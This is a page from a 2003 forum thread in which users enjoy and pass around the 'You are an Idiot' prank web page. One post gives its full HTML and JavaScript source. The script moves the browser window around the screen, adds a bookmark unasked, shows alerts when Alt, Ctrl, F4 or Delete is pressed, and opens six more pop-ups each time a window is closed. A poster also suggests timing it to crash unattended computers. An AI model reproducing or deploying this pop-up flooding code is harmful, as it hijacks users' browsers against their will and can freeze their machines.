Page 2 of 3 FirstFirst 123 LastLast
Results 11 to 20 of 22

Thread: Do Not Click Here!

  1. #11
    Got_brains?'s Avatar Poster
    Join Date
    Feb 2003
    Location
    USA
    Posts
    691
    That was awesome! I dl the files for an even more extreme 'You are an Idiot' session. I had 55 ie windows going, before the taskmanager could shut down iexplorer. Alt-F4 stopped working and I had a whole bunch of error windows open telling me that I was out of space. Now, IE doesnt maxmise right. Verry cool.

    It probally would crash comps if user wasnt around. How about putting a timer on it so at 12 o' clock it starts up? That would get up people.

  2. Lounge   -   #12
    Poster
    Join Date
    Dec 2002
    Location
    England
    Posts
    2,369
    Nobody1234 Posted on 16 February 2003 - 01:04
    --------------------------------------------------------------------------------
    ahhh come on TBO you gotta check it out.

    I did!
    I couln't resist any longer...that was mad!! ..curiosity kills this cat!!

  3. Lounge   -   #13
    haha i resisted temptation... by reading what you people had to say...

  4. Lounge   -   #14
    Poster
    Join Date
    Aug 2002
    Location
    Norway
    Posts
    412
    wow nice one datamore

    btw hwo did you got window move automaticlly??

  5. Lounge   -   #15
    Poster
    Join Date
    Oct 2002
    Location
    Hamilton, Ontario, Canada
    Posts
    31
    did you make this youself?? if so then nice work, i am currently laughing at basically everyone i know on msn messenger, now i guess all we need is some way to avoid people from pressing ctrl-alt-del...thats how i closed it, just hit ctrl-alt-del then selected all the idiot thingys then hit end task, worked nicely , just wanted to say nice work, ya i would also like to know how you got it to move on its own as well, also does this work on all browsers or just IE???

  6. Lounge   -   #16
    Poster
    Join Date
    Jan 2003
    Location
    Portugal
    Posts
    853
    Sorry to tell you all but I didn't create it.

    I found it out by accident while making a Google search for flash animations.

    Needless to say that it was fun as hell when I first found it!

  7. Lounge   -   #17
    Poster
    Join Date
    Oct 2002
    Location
    Hamilton, Ontario, Canada
    Posts
    31
    lol ok, man i just cant get enough of this thing, all my friends are going crazy on me hahahahaha

  8. Lounge   -   #18
    Poster
    Join Date
    Jan 2003
    Location
    Portugal
    Posts
    853
    Don't know if this helps but here is the HTML code of that page and the flash animation:

    HTML Code
    Flash Animation

    To download just right-click on the links and choose 'Save Target As...'

  9. Lounge   -   #19
    imported_uncle_cracker
    Guest
    it's really crazy

    if you like it ---- here is the source code

    i like this, especialy the sound, oh my god



    <html>
    <head>
    <title>You are an idiot&#33;</title>
    &#60;script language=Javascript>

    function bookmark() {
    if ((navigator.appName == "Microsoft Internet Explorer")
    && (parseInt(navigator.appVersion) >= 4))
    {
    var url="http://n00b.imess.net/idiot.html";
    var title="Idiot&#33;";
    window.external.AddFavorite(url,title);
    }
    }

    function altf4key() { if (event.keyCode == 18 || event.keyCode == 115) alert("You are an idiot&#33;"); }
    function ctrlkey() { if (event.keyCode == 17) alert("You are an idiot&#33;"); }
    function delkey() { if (event.keyCode == 46) alert("You are an idiot&#33;"); }

    var xOff = 5;
    var yOff = 5;
    var xPos = 400;
    var yPos = -100;
    var flagRun = 1;

    function openWindow(url){
    aWindow = window.open(url,"_blank", &#39;menubar=no,status=no,toolbar=noresizable=no,width=180,height=175,titlebar=no,alwaysRaised=yes&#39;
    }

    function procreate(){
    openWindow(&#39;pictures.html&#39;
    openWindow(&#39;pictures.html&#39;
    openWindow(&#39;pictures.html&#39;
    openWindow(&#39;pictures.html&#39;
    openWindow(&#39;pictures.html&#39;
    openWindow(&#39;pictures.html&#39;
    }

    function newXlt(){
    xOff = Math.ceil( 0 - 6 * Math.random()) * 5 - 10 ;
    window.focus()}

    function newXrt(){
    xOff = Math.ceil(7 * Math.random()) * 5 - 10 ;
    }

    function newYup(){
    yOff = Math.ceil( 0 - 6 * Math.random()) * 5 - 10 ;
    }

    function newYdn(){
    yOff = Math.ceil( 7 * Math.random()) * 5 - 10 ;
    }
    function fOff(){
    flagrun = 0;
    }

    function playBall(){
    xPos += xOff;
    yPos += yOff;
    if (xPos > screen.width-175){
    newXlt();
    }
    if (xPos < 0){
    newXrt();
    }
    if (yPos > screen.height-100){
    newYup();
    }
    if (yPos < 0){
    newYdn();
    }
    if (flagRun == 1){
    window.moveTo(xPos,yPos);
    setTimeout(&#39;playBall()&#39;,1);
    }
    }

    </script>
    </head>
    <body bgColor=#ffffff onload="flagRun=1;playBall();return true;bookmark();" onKeyDown="altf4key();ctrlkey();delkey();" onUnLoad="procreate()" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
    <object classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" width="100%" height="100%">
    <param name=movie value="youare.swf">
    <param name=quality value=high>
    <embed src="youare.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="100%" height="100%">
    </embed>
    </object>
    </body>
    </html>

    cu

  10. Lounge   -   #20
    imported_uncle_cracker
    Guest
    Originally posted by DataMore@16 February 2003 - 23:30
    Don&#39;t know if this helps but here is the HTML code of that page and the flash animation:

    HTML Code
    Flash Animation

    To download just right-click on the links and choose &#39;Save Target As...&#39;
    you were a little bit faster than me

    it&#39;s really crazy

    cu

Page 2 of 3 FirstFirst 123 LastLast

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •